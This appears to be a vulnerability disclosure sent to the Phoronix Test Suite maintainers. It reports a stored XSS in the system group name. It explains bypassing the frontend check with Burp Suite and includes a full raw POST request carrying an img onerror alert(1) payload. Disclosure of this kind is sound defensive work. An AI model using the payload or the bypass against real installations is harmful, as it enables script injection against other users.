Hi there phoronix test suite maintainer team.
There is a stored XSS in phoronix-test-suite source code. This is in group name.
<img src>
. Note that you cannot create this on the UI because JavaScript to forbid this is implemented. To do that, you need a tool like Burp Suite to bypass frontend check and create system group directly. A request for creating group with specials would look like this:POST /?systems HTTP/1.1
Host: {phoronix}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Origin: {phoronix}
Connection: close
Referer:{phoronix}?systems
Cookie: PHPSESSID=blfirmens92e3129mt1lsjt3m6; pts_websocket_server=ws%3A%2F%2F127.0.1.1%3A8427%2F
Upgrade-Insecure-Requests: 1
new_group=1235<img+src=a+onerror=alert(1)>
/?systems
and see that an alert pops up.This vulnerability is capable of stored XSS.